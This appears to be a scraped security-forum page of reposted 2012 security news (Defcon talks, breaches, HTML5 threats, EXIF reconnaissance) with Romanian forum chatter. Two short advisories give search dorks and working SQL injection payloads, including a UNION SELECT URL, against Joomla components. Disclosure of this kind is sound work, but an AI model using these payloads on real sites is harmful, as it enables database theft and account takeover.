DarkyAngel

Anonymous vows to take down the Web sites of a French online fashion retailer that has trademarked the iconic Anonymous logo and slogan. Anonymous' iconic logo was quietly trademarked in France in February, but now that Anonymous has found out, it's not going to take it lying down. Twitter user Asher_Wolf picked up on the trademark application (PDF) yesterday, but the application was first filed with the Institut National De La Propriete Industrielle (INPI) in France on February 16 by Apollinaire Auffret from Early Flicker, encompassing both the Anonymous logo and slogan. Early Flicker has an eBay store that appears to sell a variety of Anonymous-themed T-shirts. Following the revelation yesterday, Anonymous has responded via a YouTube video, and has promised distributed denial-of-service attacks on Early Flicker's sites. Below is the Anonymous response. Sursa

Police are indiscriminately capturing photos of license plates with cameras on roadways that also record the date, time and location, ACLU says. LAS VEGAS - The American Civil Liberties Union wants to know how police around the country are using automatic license plate readers to track people's movements. The ACLU today sent requests for information to police departments in 38 states and filed federal Freedom of Information Act requests with the departments of Justice, Homeland Security and Transportation to try to find out how much the governments use the technology and how much it is paying to expand the program. Mounted on patrol cars, telephone poles and under bridges, the automatic license plate readers (ALPRs) can snap a photograph of every license plate that passes by. They also record the time, date and location based on GPS, and send an alert to officers when a license plate is recorded that matches a stolen vehicle, according to the ACLU. It's unclear how long the data is retained, whether different departments are pooling the information in state, regional and national databases and what purposes it is used for, Kade Crockford, director of technology for the Liberty Project at the ACLU of Massachusetts, told CNET at Defcon this weekend. Tracking and recording data on peoples' movements so broadly raises serious privacy concerns because it means police will be able to know who goes where, when and for how long, Crockford said. The system would also allow police to do retroactive surveillance, by searching in the data for a specific car's whereabouts at any point in time, she added. Crockford is concerned about the broad scope of the surveillance, which can track every motorist, not just those who are suspected of crimes. "The system is ripe for abuse," for mass routine location tracking, as well as for unwarranted use against select individuals, she said. "They will have all this data on people who have not been accused of any wrongdoing" Crockford said. "Do we want a world in which the police know where we were five years ago?" Meanwhile, private companies like tow truck operators are also using the systems and selling the data to police and data mining firms, she said. The government needs to set standards for collecting, retaining and sharing the data and impose strict requirements to provide privacy protections for people now before the systems become too widespread, Crockford said. Spokespeople at the DHS did not immediately respond to a request for comment. A DOJ spokeswoman said the agency does not comment on pending FOIA requests. A DOT spokeswoman said she had passed the request to the appropriate officials. The controversial systems are already taking some heat. After lawmakers in Utah expressed privacy concerns about them, the U.S. Drug Enforcement Agency withdrew its request to have automated license plate readers installed on parts of Interstate 15 in that state, but has not said it is abandoning the program, the Deseret News of Salt Lake City reported last month. The police might take a cue from Google, which said it would remove license plates from its Google Map Street View images after people complained. Sursa

German security researcher says the Chinese government doesn't need to demand back doors on Huawei routers because there are already major holes in their firmware. LAS VEGAS -- A German security researcher says he has uncovered several security holes in routers made by China-based Huawei that are used by many Internet service providers -- vulnerabilities that could allow attackers to take control of the devices and snoop on peoples' traffic. Huawei routers are mostly used in Asia, Africa and the Middle East. Because they're cheap, though, they're increasingly turning up in other parts of the world, the German researcher -- Felix Lindner, also known as "FX" -- said in an interview with CNET after his Defcon talk on Sunday. The problem is due to the use of "1990s-style code" in the firmware of some Huawei VRP routers, he said. (The models are the Huawei AR18 and AR 29 series, IDG News Service reports). With a known exploit, an attacker could get access to the systems, log in as administrator, change the admin passwords and reconfigure the systems, which would allow for interception of all the traffic running through the routers, said Lindner, who heads Berlin-based Recurity Labs. Asked about reports that Huawei routers have back doors per the Chinese government's request, Lindner said: "They don't need to. You (just) need to have Huawei people running your network or help run your network... If you have so many vulnerabilities, they are the best form of (attack) vector." Reached for comment earlier today, a U.S.-based Huawei spokeswoman said she would e-mail a statement to CNET. This post will be updated when we receive the statement. The research is scary for not only the ISPs using the vulnerable routers, but also for millions of their customers who don't realize that their communications could be spied on, said Dan Kaminsky, security expert and chief scientist at DKH. "It's a big deal for routers to get broken into," especially those made by the fastest growing router manufacturer, he told CNET. "If you can get into a router you can take it over, monitor and alter peoples' traffic. You become a man-in-the-middle" attacker who can spoof legitimate Web sites. Even systems that rely on encryption aren't safe because many of them have inadequate authentication, which allows attackers to pretend to be any site they want, Kaminsky said. Update, July 31 at 10:16 a.m. PT: A U.S.-based Huawei representative provided CNET with the following statement: Sursa

Looking for a high-grade door lock? How about a satellite phone? Or maybe you've been craving a Wi-Fi Pineapple? Whatever gadget you desire, chances are you can buy it in the vendor room at Defcon. LAS VEGAS -- While ninjas inhaled much of the available oxygen in the vendors room, with its truck-based Ninja Tel mobile network, other vendors offered a more esoteric menu of hackables at Defcon this year. Vendors at the hackers conference came in all sizes. Some signed up hackers to donate their skills to impoverished communities. Others appealed to sartorially minded hackers, with unofficial Defcon 20 T-shirts and other wearables. In this gallery, CNET showcases three vendors who were offering something interesting or unexpected: Hak5's Darren Kitchen and his penetration-testing tools; Meco proprietor Ira Moser and his collection of antiquated yet usable hardware; and Mitch Capper and SecuritySnobs.com with their set of unusual locks. More pics here ! Sursa

http://p-o-s.org Is Up -> Check if your website is up or down? la ce te referi prin "nu se deschide" ?

Title : Joomla com_niceajaxpoll <= 1.3.0 SQL Injection Vulnerability Author : Patrick de Brouwer - @knickz0r Dork : inurl:"/index.php?option=com_niceajaxpoll" + -- --=[ 0x01 - Software description Nice Ajax Poll is a component for the Joomla! CMS which all- ows users to vote on certain questions or statements. + -- --=[ 0x02 - Vulnerability description There is a SQL Injection vulnerability that can be called f- rom within the website to perform the SQL Injection attack. + -- --=[ 0x03 - Impact The impact of this vulnerability should be rated as critical as it is possible to access the database and therefore retr- eive user information such as usernames, passwords and other data. When abused, hackers could gain access to the adminis- trative interface of Joomla. + -- --=[ 0x04 - Affected versions As of the source code, the version containint this vulnerab- ility was version 1.3.0. It was not proven that the vulnera- bility does not exist in newer or earlier versions. Therfore the vulnerability is considered available in versions below 1.3.0. + -- --=[ 0x05 - Vendor contact trail Contact has not been made with the author. Author will rece- ive a copy of the vulnerability disclosure. + -- --=[ 0x06 - Proof of Concept (PoC) In: /components/com_niceajaxpoll/views/niceajaxpoll/tmpl/default.php there is a call to: index.php?option=com_niceajaxpoll&getpliseid="+id, which is located on line 32. In practice this vulnerability has been verified by exploiting the following: /index.php?option=com_niceajaxpoll&getpliseid=1 OR 1=1 ,------- '- SQLi Sursa

Exploit Title: Joomla com_movm SQL Injection Date: [31-07-2012] Author: Daniel Barragan "D4NB4R" p0C http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20 Sursa

- New application -> Chat PoS, care poate fi accesat doar din interiorul PoS-ului, pe baza blueimp ajax chat. - în urma ^ chat PoS, Chat ( sau Board-ul ) -> devine Anun?uri ?i doar administratorii pot posta. - Radio RST updated, func?ioneaz? excelent. - Dock-ul de sus modificat, chat + radio ad?ugate în "Network", aplica?ia de ajutor, ad?ugat? în "System". - Suport? acum mai multe tipuri de fi?iere, dac? întâmpina?i vreun fi?ier care nu e suportat ?i crede?i c? ar fi folositor s? îl "implement?m", trimite?i un "mesaj intern" din aplica?ia "Mail" c?tre DarkyAngel sau ps-axl, sau din "Ask for help" din aplica?ia "Help" . P.S : la un fi?ier care nu e suportat, va ap?rea o fereastr? care v? va spune c? înc? nu e suportat / nu func?ioneaz?. P.S.2 : de asemenea, dac? g?si?i vreun bug / eroare / problem? de securitate o pute?i raporta prin acela?i mod explicat mai sus ( mesaj la DarkyAngel sau ps-axl, sau "ask for help")

p?i.. având în vedere c? ai gre?it categoria.. P.S.1 : google te poate ajuta.. P.S.2 : https://blueimp.net/ajax/

Amendments to cybersecurity bill in Senate aim to boost privacy protections. As the U.S. Senate races toward its August recess, lawmakers are filing tons of amendments to the Cybersecurity Act, a number of them designed to add privacy protections. The amendments are an effort to meet the wishes of pro-business Republicans and pro-privacy Democrats and to reach a compromise that can be enacted into law. Sen. Harry Reid (D-Nevada) is pushing to get cybersecurity legislation voted on this week before the Senate breaks for recess in August. The Democrat-based Cybersecurity Act of 2012, sponsored by Sen. Joseph Lieberman (I-Conn.) as it stands has already been modified to meet the needs of both sides of the aisle. Earlier this month, the bill was revised to remove a provision calling for critical infrastructure providers to meet minimum security standards, which Republicans argued was too regulatory and restrictive on businesses. It also added a provision preserving the civil liberties and privacy of users. Republicans want security standards to be voluntary rather than government-driven and Democrats want to ensure that consumer privacy is protected when firms share information on cybersecurity incidents with the government. More than 70 amendments have been filed, Broadcasting and Cable reported today. Some were totally unrelated to the topic of cybersecurity, such as gun control-related amendments and amendments that try to undermine the health-care law. In one of his three amendments, Sen. Ron Wyden (D-Ore.) is trying to prevent warrantless tracking of people via GPS (Global Positioning System) data. Wyden wants clear rules for how and when the government can access location tracking data from individuals' cell phones and other electronic devices. Specifically, the first amendment would require that government agencies get a probable cause warrant to obtain geolocation data. It also would force corporations to get customer consent before sharing customer data outside the normal course of business and would make it a crime to secretly track someone's movements online. Wyden also wants to limit government access to private consumer data stored by cloud-storage services alongside government data, and to strengthen limits on sharing individuals' personal information with law enforcement. The second Wyden amendment would prohibit government from accessing consumer's private data solely because it's stored by a company that provides information services to a government agency. And a third amendment would require Congressional approval before the president could enter the U.S. into a binding international agreement on cybersecurity. Sen. Al Franken (D-Minn.) has introduced an amendment that would delete provisions in the Cybersecurity Act that allow ISPs and others to monitor their customers' communications and deploy countermeasures without government oversight or legal liability. And Sen. Patrick Leahy (D-Vt.) yesterday filed several amendments also related to privacy, including provisions that make it a crime for companies to hide data breaches from customers, require companies with databases of sensitive consumer data to take security precautions, and call for a national standard for data-breach notification. In addition, he has proposed language that would allow people to share video-viewing history online, which is currently prohibited because of a law designed to protect video-rental records during the 1980s. Lawmakers and the Obama Administration are anxious to get a measure in place to keep hackers, cyberspies, and malware out of the computer systems of power companies, utilities, and other critical infrastructure providers in the face of growing cyberattacks and threats. Sursa

After a two-week investigation, the online file storage service confirms that usernames and passwords were stolen from third party Web sites and then used to access Dropbox accounts. When a few hundred Dropbox users began receiving spam emails about online casinos and gambling sites two weeks ago, it seemed like something was up. And indeed there was. The online file storage service confirmed today that hackers accessed usernames and passwords from third party sites and then used them to get into Dropbox users' accounts. "Our investigation found that usernames and passwords recently stolen from other websites were used to sign in to a small number of Dropbox accounts. We've contacted these users and have helped them protect their accounts," the company wrote in a blog post today. "A stolen password was also used to access an employee Dropbox account containing a project document with user email addresses. We believe this improper access is what led to the spam." When the problem first began earlier in the month, several Dropbox users posted on the company's Web site forum saying they received spam from email addresses only associated with Dropbox. By the time the company got a hold on the situation, 295 people had posted on the forum. The majority of the users were European, coming from Germany, Holland, and the U.K. Dropbox has since put in place additional security controls to avoid a repeat occurrence. According to the company blog post, here are some of the steps it is taking: The file storage service also recommends that users avoid using the same password on multiple sites, since it means that if one site has a security breach then all accounts could be at risk. As TechCrunch notes, Dropbox's security breach is eerily reminiscent of LinkedIn's mega-password leak in June. Sursa

Microsoft renunta la brandul Hotmail. Utilizatorii serviciului de email vor fi redirectionati in curand catre noul Outlook.com, ce ofera o experienta imbunatatita, cu elementele grafice ale interfetei Metro din Windows 8. Simplificarea serviciilor Microsoft continua cu eliminarea Hotmail, serviciul de email lansat in 1996. Utilizatorii pot incerca in prezent noua interfata pentru email pe site-ul Outlook.com, in care vei fi logat automat daca esti logat deja in Hotmail. In afara de noua interfata ce seamana mult cu Gmail, Microsoft pregateste 3 elemente cheie pentru noul email Outlook.com. Noul email care inlocuieste Hotmail beneficiaza de integrare SkyDrive, astfel incat atasamentele oricat de mari pot fi accesate pe orice gadget, iar calendarul din Windows 8 va fi sincronizat in mod similar. Outlook.com este primul serviciu de email conectat direct la Facebook, Twitter, LinkedIn, Google, iar Skype se va alatura in curand listei. In plus, noul email Microsoft include si aplicatii web gratuite. Documentele Microsoft Word, PowerPoint, Excel si OneNote vor putea fi astfel editate direct in inbox de catre utilizatori. Sursa

Windows 8 pare a fi cel mai sigur sistem de operare, dupa ce a "scapat" neatins de atacurile hackerilor la conferintele Black Hat si DEF CON. Si Windows Phone 8 ar putea fi cel mai sigur sistem de operare mobil. Masurile de protectie impotriva aplicatiilor malware au insa un pret: actiunile utilizatorului sunt mai restrictionate ca pana acum, insa fisierele si informatiile sale personale sunt mai sigure. In timp ce optiunile Secure si Trusted Boot asigura protectia completa impotriva aplicatiilor rootkit, fiecare aplicatie Metro este rulata intr-un sandbox. Atacurile informatice sunt ingreunate foarte mult, deoarece Windows 8 avertizeaza asupra oricarei aplicatii descarcate online ce ar putea crea vulnerabilitati. Absenta completa a aplicatiilor malware pentru Windows Phone 7 nu i-a impiedicat insa pe specialistii Microsoft sa introduca optiuni de siguranta similare pentru Windows Phone 8. Ramane de vazut daca noul sistem de operare Microsoft, pregatit pentru o lansare in 26 octombrie, va oferi cu adevarat protectia promisa. Sursa

Police in South Korea have reportedly arrested two people for hacking into the network of KT Corp., the country's second largest mobile carrier and selling the data. According to a report by the Yonhap News Agency, police arrested a 40-yeard-old suspect – identified only by his family name of Choi – as well as a second person and accused them of leaking the personal information of roughly 8.7 million mobile phone subscribers since February. Police suspect the telemarketers used the data, which contained information about the subscribers, their phones and monthly plans, to contact customers whose contracts were close to expiring or who were judged to be likely to change phone plans. Authorities estimate the suspects earned at least 1 billion won (US$877,000) from the illegal marketing scheme. "It took nearly seven months to develop the hacking program and (the suspects) had very sophisticated hacking skills," an official at the National Police Agency's cyber terror response team told the Yonhap News Agency. KT apologized for the incident, noting in a statement that it has recovered the leaked information and taken necessary steps to prevent any further leaks. The company asked police to investigate possible leaks July 13 after observing suspicious activities through internal monitoring, according to a report in BusinessWeek. "In light of this incident, we will strengthen the internal security system and raise awareness of security among all employees to prevent causing inconvenience to customers," the carrier said in a statement to Yonhap. A year ago, an even more significant breach occurred when hackers hit SK Telecom, yet another one of South Korea's large telecommunications companies. In that incident, personal information belonging to 35 million users of SK Telecom's Cyworld social networking service and Nate web portal were exposed. Sursa

Sophos on Monday officially launched Sophos Mobile Security, a free mobile security solution designed to protect Android devices against malware, privacy issues and lost hardware. With minimal impact on device performance or battery life, Sophos says the solution makes use of near real-time intelligence from its network of threat intelligence centers and automatically scans apps as users attempt to install them, and blocks potentially dangerous apps and malicious code. Sophos Mobile Security also helps locate lost or stolen Android devices and provides a remote lock to help lock down and protect data in the event a mobile device is lost of left behind. In its 2011 Mobile Threats Report, Juniper Networks said there was a 155 percent increase in mobile malware across all mobile platforms in 2011, and a whopping 3,325 percent increase in malware specifically targeting the Android platform in the last seven months of 2011 alone. "We're seeing no slowdown in the number of malicious apps, as more smartphone owners use their devices to not only store personal data, but also access social networks and the Internet,” said Matthias Pankert, vice president, product management, Sophos. "Android users must be vigilant as the number of threats continues its rapid ascent…" The company said that later this year it will offer a managed Enterprise version of Sophos Mobile Security that will come with enhanced functionality and provide better protection for corporate devices and data. Sophos Mobile Security is available from Google Play here. Sursa

A researcher with viaForensics demonstrated how to beat encryption for Android devices at the DEF CON security conference in Las Vegas. According to Thomas Cannon, director of research and development for viaForensics, the idea was to demonstrate the ways that black hats – or the government – can get access to the data on a user's phone if it is lost, seized or stolen. Rather than rely on a flaw in the encryption itself, Cannon choose to show how a sophisticated attacker can brute force weak passwords protecting a device. "I presented on a number of methods for gaining access to user data on Android devices," he told SecurityWeek after his presentation. "Our initial review is that the encryption is solid and implemented properly," he continued, "so the only option we have is to brute force the user password and derive the correct encryption key. I showed how the encryption is implemented how to brute force the password and that for PINs we can do it in seconds…We also released a tool which cracks PINs as a proof of concept." According to Thomas Cannon, a hacker would have to obtain a copy of the userdata partition and the encrypted master key with salt stored in a footer file. To do this, the attacker would need to obtain access to the device through an unlocked Bootloader, JTAG, chip-off or an exploit in the firmware. "Once you have those, you can run password guesses through the decryption process and see if it is successful (at a simple level)," he said. "This is automated and can be optimized to try large numbers of guesses very fast. The implications of the attack are that if you have a weak encryption password it will be possible to crack your encrypted key and get at your data in a reasonable time frame. In that sense it is no different from any other system which uses passwords." He described the level of sophistication necessary for the attack as high. "So the presentation was about how your data can be accessed, techniques used, it wasn't aimed at warning users about a flaw in the encryption," he said. "If there is a flaw it is that on stock Android devices the encryption password is the same as the lock screen password, meaning that users set passwords that are easy and quick to type, which can be cracked. Advanced users with root access can change their encryption password while keeping their lock screen password simple, but this isn't an option for regular users. It is a balance between convenience and security, and the users have to decide where to draw that line." Sursa

normal, doar lumea vrea s? fac? bani nu? are 10 posturi, ?i nu ?tia unde altundeva s? fac? reclam?. oricum merit? ban.

level 9.. cred c? are 17, cam to?i din top 10 sau cât e, au 17 maxim..

1. titlu neadecvat 2. posturi pu?ine 3. mai continu?m..? câte reguli mai încalci? P.S: ai viru?i

Bit9 Raises $34.5 Million In Round Led By Sequoia Capital Bit9, a provider of application whitelisting security solutions, today announced that it has closed $34.5 million in Series D funding in a round led by Sequoia Capital. The company says it will use the new capital to fund new product development efforts and expand sales and marketing. Bit9 provides trust-based application control and whitelisting technologies to help companies defend against advanced threats that traditional anti-malware protections may not identify. The company's security solutions help provide visibility and control over all software on endpoints, to reduce the risk caused malware, targeted attacks and Advanced Persistent Threats. “This latest round of funding is the largest in the company’s history and underscores the support Bit9 has received from investors who understand the changing nature of the security market,” said Patrick Morley, president and CEO of Bit9. “It places a bet squarely on our vision and technology. It’s an exciting time as we are dramatically changing how organizations protect themselves from IP theft and advanced attacks by focusing on a trust-based approach.” The company says that it has grown 100 percent year-over-year for the past two years, and currently protects more than 700 organizations across various industries including education, finance, government, healthcare, retail and utilities. In 2003, Bit9 was awarded a $2M United States federal research grant from the National Institute of Standards and Technology-Advanced Technology Program (NIST ATP) to conduct the research that is now at the core of its application whitelisting solutions. In April 2011, Waltham, Massachusetts based Bit9 raised $12.5 million in funding. In September 2011 the company announced that Richard Clarke, former Cybersecurity Czar for President George W. Bush, joined the company’s Board of Directors. Existing investors Atlas Venture, Highland Capital Partners, Kleiner Perkins Caufield & Byers, and .406 Ventures also participated in the round. Sursa

InfoSec Needs to Improve Organizational Communication [black Hat] BLACK HAT USA 2012 - Information security professionals can establish a better relationship with the users within the organization by improving lines of communication, a security analyst told Black Hat attendees. Information security professionals are struggling to improve organizational acceptance of information security and to convince users to view security differently, James Philput, a senior information security analyst with Information Assurance Professionals, said during a presentation on the last day of the Black Hat conference in Las Vegas. One way to accomplish this goal was to change how IT interacted with users on a regular basis, Philput said. Infosec doesn't have the best reputation among its users, pointed out Philput. People regularly accuse security of getting in the way of work. IT often takes the preventive approach of ignoring what users are saying and locking things down, Philput said. Instead, the security team should be listening to what the users need and what they are looking for, he said. Business needs always trump security, Philput said, adding, “Geeks hate this.” Changing perspectives within the organization may be “daunting, but doable,” Philput explained. Infosec needs to speak in terms the users understand, such as reminding executives that the costs of a data breach includes damage to the brand as well as to individual executive's reputations, Philput said. The goal is to make the users care about doing the right thing without resorting to heavy-handed tactics. “Users accept limitations they understand,” Philput said. As a case study, Philput described a situation in which a medical clinic was looking to deploy a less secure system for accessing patient records. By taking the time to speak with the clinicians, the security team could figure out why the users preferred the proposed system, and then identify issues the users recognized as problems, Philput suggested. Instead of focusing on costs or issues with policy, the team could highlight problems with HIPAA compliance, which the clinicians are more likely to be concerned about, Philput said. “Don't forget to listen to the users,” Philput said, noting that by listening, the team can often come up with workarounds to solve the problem at hand. Information security professionals were often the biggest obstacles in gaining user acceptanace because they create an antagonistic situation where it's “us versus them,” Philput said. “Not fully understanding IT is not a crime,” he added, noting that the users are experts in their respective fields, such as marketing. Different groups of users want different types of information from information security. C-level executives are generally concerned about how much they have to spend to get a certain outcome, and what is the easiest task. In contrast, non-technical managers generally wants to know how something impacts the company and the individual users, and why it matters, Philput said. And finally, technical managers want to know what the problem is, how it will be solved, and the likelihood of any issues. The bad guys are winning in the security war and for the good guys to have any shot at winning, infosec and users need to cooperate, Philput said. “Unless you have the backing of the users, it's never going to happen”. A final simple piece of advice from Philput: "Write shorter emails." Sursa

HTML5 Top 10 Security Threats, Stealth Attacks and Silent Exploits HTML5, the new Web standard that will make it easier to develop websites and applications that run on various screen sizes, is also vulnerable to stealth attacks and silent exploits, a security researcher said at the Black Hat security conference. HTML5 faces a number of threats, including cross-site scripting and resource hijacking, Shreeraj Shah, founder of application security vendor Blueinfy, told attendees at the Black Hat security conference in Las Vegas Thursday. The fact that the new Web standard has cross-platform support and integrates several other technologies increases the attack surface, Shah said. Even though it is still new and evolving, attacks against the new standard is already on the rise, Shah said. HTML5 pulls together many components, including XMLHttpRequest (XHR), cross-origin resource sharing (CORS), webSQL, and localstorage. In addition to the elements included in the specification such as Web messaging, Web sockets, and Canvas 2D, HTML5 includes related technologies such as SVG for graphics, CSS3 for stylesheets, Geolocation, and APIs for Calendar and File, among others. “HTML5 is out there and people are using it,” Shah told attendees. Attacks against HTML5 are stealthy, and silent and generally target the application's presentation and the business logic layers, Shah said. The top 10 threats against HTML5 target XHR and HTML5 tags, feature-rich components such as browser SQL and storage, and DOM, said Shah. The list is as follows: 1. CSRF with XHR and CORS bypass 2. Jacking – click, CORS, tabs 3. HTML5-driven cross-site scripting using tags, events and attributes 4. Attacking storage and DOM variables 5. Exploiting Browser SQL points 6. Injection with Web Messaging and Workers 7. DOM-based cross site scripting and issues 8. Offline attacks and cross-widget vectors 9. Web socket issues 10. API and protocol attacks The new technologies that make up HTML5 brings in several new threats. CORS is vulnerable to data transfer and origin issues, HTML5 forms can be manipulated, and client-side storage and SQL exposes the application to injection attacks, Shah said. It was critical to address how these attack vectors would work in today's environment before attackers start taking advantage of these features for malicious purposes, Shah explained. Shah called the XHR object in HTML5 “very powerful,” as it allows a variety of features, such as cross-origins requests and binary uploads and downloads. Attacks include bypass CORS preflight calls, forcing authentication cookies to replay with credentials, internal network scanning and tunneling, information harvesting, and abusing the business logic by uploading binary streams. Users could be tricked into uploading content onto the server, Shah said. Some of the threat vectors can be mitigated by strengthening the CORS implementation, using secure JavaScript coding practices, and improving CORS controls, Shah said. Developers should look at secure libraries for streaming HTML5/Web 2.0 content and secure CORS. Developers should also employ standard cross-site-scripting protections and not store sensitive information inside localStorage. Shah called the top 10 vectors just the “beginning,” and that HTML5 is just “warming up.” Different libraries and ways of development are bound to emerge over time and open up new risks and security issues. Looking at these threats would provide some ideas about security controls necessary for future applications, he said. Sursa

Securing The Virtualized Data Center - Top Five Considerations We are currently deep in the throes of a global data center refresh cycle, driven by technology and business drivers. Virtualization and cloud computing are changing how data centers are being architected. The new threat landscape has framed the challenge of securing data and applications in a new light, and secure mobility and the extended enterprise have amplified the complexity of data center access. As organizations look at data center consolidation or new data center designs, it’s a great time to be thinking of security, and building it into the network architecture instead of attempting to bolt it on later. This principle of “building security into the network” isn’t new. Security architects have long espoused the benefits of doing so, as adding security after the fact is likely to increase costs and complexity. Imagine if automobile companies manufactured cars without seat belts or airbags, the cost to add them later would not only be prohibitive, it would negatively impact both the bolted-on functions delivered and the overall characteristics of the product. Similarly, the performance of a data center would likely be impacted if you bolted security on later. In principle, building security into the virtualized data center seems simple enough. But where and how do you start? Here are the top 5 things you should consider. Create a Security Policy As the King said to Alice in Wonderland, "Begin at the beginning, and go on till you come to the end, then stop”. The very beginning, the very first thing you should do is define your security policy. A security policy is a necessary evil, it is a blueprint that defines the overall security objectives, rules and regulations for an organization. Without it, you either spend your time fighting security fires as they flare up or walking around completely lost as to which rules are enforceable and which are not. A security policy may include a disaster recovery plan, governmental and industry regulations to comply with, safe application enablement policies and more. The security policies should tightly align with the business objectives for the organization, must have the buy-in of key stakeholders, must be documented and communicated, and must be enforced. There are specific characteristics of the virtualized data center that you will need to consider in the security policy, such as the ability for services to be delivered in a more dynamic, on-demand way. Therefore, your policy should consider implications of combining virtualization workloads with different trust levels on the same server, and whether live migration of VMs should be restricted to servers supporting workloads with the same trust levels. Security is complex enough, allow yourself room to address requirements in a phased approach. For example, in the initial phase of your virtualized data center, allow only workloads with the same trust levels on a server. Over time, you can allow workloads with different trust levels on the same server, and plan for a policy change to accommodate intra-host VM traffic inspection within the server. Define the Applications in the Data Center The key principle to apply with application enablement in your virtualized data center is to build a positive enforcement policy. A positive enforcement approach for your virtualized data center means that you identify, control and allow what is required for business operations in your organization. The alternative, negative enforcement approach means you would selectively block everything that is not allowed, requiring a significant amount of never-ending effort to track all new applications and decide if they should be enabled or not. The task to identify and safely enable applications in the virtualized data center is harder than it seems. Application developers have been known to implement applications on any port that is convenient or bypass security controls altogether. It is not uncommon to find tech-savvy employees using remote access tools on non-standard ports. DBAs are equally guilty of running SQL instances on non-standard ports. The ease of application creation and delivery with virtualized data centers and cloud exacerbates the problem. The problem is that applications can also be used as a launch platform for attacks and carry threats inside a company’s network. Many applications are using tactics like non-standard ports, port-hopping, hiding within SSL encryption, tunneling within commonly used services to bypass traditional security controls. Understanding your applications, and safely enabling only applications required for the day-to-day business operations helps to reduce the attack surface for your organization. Fortunately, next-generation security solutions can help with this. In fact, by deploying next-generation firewalls in monitor mode, you can get visibility into all data center traffic, begin to create this list of “allowed” and IT-sanctioned applications, before safely enabling different application functions at a granular level. Once you have identified all of your applications, you can also inspect the allowed applications for any embedded threats. In a well-designed virtualized data center, unknown traffic should be a very small percentage of traffic if it exists at all. The ability to identify and analyze unknown traffic is essential in a data center. A next-generation firewall provides the ability to categorize and analyze unknown traffic in the network to determine whether the traffic is being generated by a legitimate application that is not recognized or is malicious malware. Understand Who is Accessing your Data Center The mission of the data center is to serve up applications to users. These users can range from employees and external business partners to contractors, all of whom can access data center applications from a multitude of devices such as tablets, mobile devices. Understanding who is accessing these applications, and how they are accessing them is critical in designing your data center to ensure that you are planning for securing their access. Plan for your security solution to integrate into your user repository so that you can enforce access policies based on users instead of IP addresses, and incorporate user information in reports and dashboards. Consider subscribing to Forrester Research Analyst John Kindervag’s Zero Trust philosophy (“do not trust, always verify”) of least privilege, where access control is strictly enforced, and minimal privileges allowed. Prepare for Threats in Your Virtualized Data Center Virtualization-specific security threats and vulnerabilities have been well documented. Because the virtualized server is made up of many different components-- from hypervisor to guest operating system and application-- each of these components need to be secured to ensure protection for the virtualized environment. But you still need to address other threats that you might see in a traditional data center. For example, an Internet-facing virtualized data center may see denial-of-service attacks or automated script-kiddie attacks, while Enterprise-facing virtualized data centers may see patient, multi-step intrusions leveraging a variety of different threat vectors. By understanding the threats to your specific data center, you can better prepare to handle them. Segment Your Virtualized Data Center As you build your virtualized data center network, the fundamental security best practice is to segment. Segmentation in the enterprise data center can ensure that vulnerable parts of the data center are isolated from other parts of the network, or that specific servers that need to comply to regulatory requirements are segmented to manage risks and reduce compliance auditing scope. It can also limit the extent of damage to your data center if a hacker breaches a part of your data center. Segmentation is the best practice even in flat, layer two networks. You should logically group systems that share similar risk factors and security classifications. For example, all common infrastructure services in the data center such as Active Directory or NTP servers are sometimes the most vulnerable and critical, because they can typically communicate with all other services. These common services must be segmented from other server tiers. Virtualized servers must be segmented appropriately based on attributes such as similar risk factors and security classification. These servers can be placed in security zones, and traffic between security zones should be selectively permitted in line with security policy and access control requirements. It is critical that segmentation be enabled by a next-generation firewall rather than VLANs or switch ACLs. Only next-generation firewalls that deliver segmentation based on user and applications instead of port and IP will be effective in securing a virtualized data center environment. Summary – Evolve Securing Your Infrastructure as Your Infrastructure Evolves This top 5 list by no means addresses all of your design considerations in building security into your virtualized data center. But, it’s a start. And unfortunately, unlike the Alice in Wonderland story, there is no ending to your security considerations. Just like a security policy is a living document that will continually be reviewed and adjusted based on new business objectives, your security considerations will continue to evolve as the application and threat landscape changes. Sursa

Welcome aboard !

Reconnaissance with Images Gathering data on a target is extremely important if we plan to execute an attack in a more efficient manner. A typical attack scenario starts with a long reconnaissance process. In this case “reconnaissance” refers to the gathering of information in any and all possible manners regarding a particular object of interest. We can gather information from websites online, dumpster-diving offline, and also through the classic act of social engineering. Online information gathering emerged after millions of people all over the world started participating in social networking sites like Orkut, Facebook, Twitter etc. People started to maintain a virtual image of themselves, which may, or may not, be similar to their real-world image. In this article, we shall see the social implications of these dual personas and how they can lead to the exploitation of vanity. We shall also look into how someone’s life can be affected and the risks of geo-localization. This article also features various tools used to perform reconnaissance with the images. Social networks like Twitter, Facebook etc. are exploiting human vanity. The Y2K syndrome highlighted global fears that there might be something out in the virtual universe that would take control of our lives—something like the implantation of GPS chips in our skin, for example. Well, it’s not “something” that takes control of our lives, instead we ourselves blithely send out various pieces of personal information in an attempt to project ourselves as something special within the virtual universe. A Classic Example of Information Leakage Through Social Networking Sites In the above image, we can glean a lot of indirect information regarding the whereabouts of the person. Mr. XYZ was at “Annamalai International Hotel” in a place called “Pondicherry” eight hours ago, and he is using a Windows phone! It’s well known that the interface shown in the above image is from Facebook. Possible Attack Scenario: It’s a reasonably valid assumption that this person uses his mobile device to check email, and to access other online accounts. Suppose I am his friend on the social networking site. Through a socially engineered attack, I can gather information regarding his habits and other personal updates by monitoring the feeds on the site. In addition, because his email ID is listed in his profile, I can probably send him a crafted mail that can gain me backdoor access to his phone through the available exploits. Or I can potentially steal his credentials; the possibilities depend on my creativity. The scenario above provides just one example where an image can speak for the individual. EXIF Data and Images: Smartphones and digital cameras (including scanners) use a standard format for images and recorded sounds. This standard is called exchangeable image file format. This information may include details about the camera model, shutter speed, focal length, etc. Most importantly, it contains GPS information about where the image was taken. By default almost all smartphones have GPS data activated. The camera setup asks the user to set it during the pre-initial setup. People tend not to remember to wipe off the GPS location data for every photo they shoot. Thus, GPS information is embedded in almost all images taken. Social and Security Issues When a member of the press releases an interview with a hacker (or another wanted criminal) offers a promise of anonymity during the telecast, that offer is not always valid. Any image that is uploaded from the interview might help an investigation by allowing examiners to track the GPS location where the image was taken. An untrained member of the press staff who publishes the image on the net might not be aware of the fact that he should have stripped off the EXIF data that’s hidden in the image. With this back ground let’s see various online and offline tools to extract metadata from an image: Jeffrey’s Exif viewer Type of tool: Online URL: Jeffrey's Exif viewer Input options to the tool Basic Information provided by the viewer This is a very basic EXIF data viewer. It shows the specifications of an image with respect to the camera. The information gained from this tool tells us the date and time when the image was 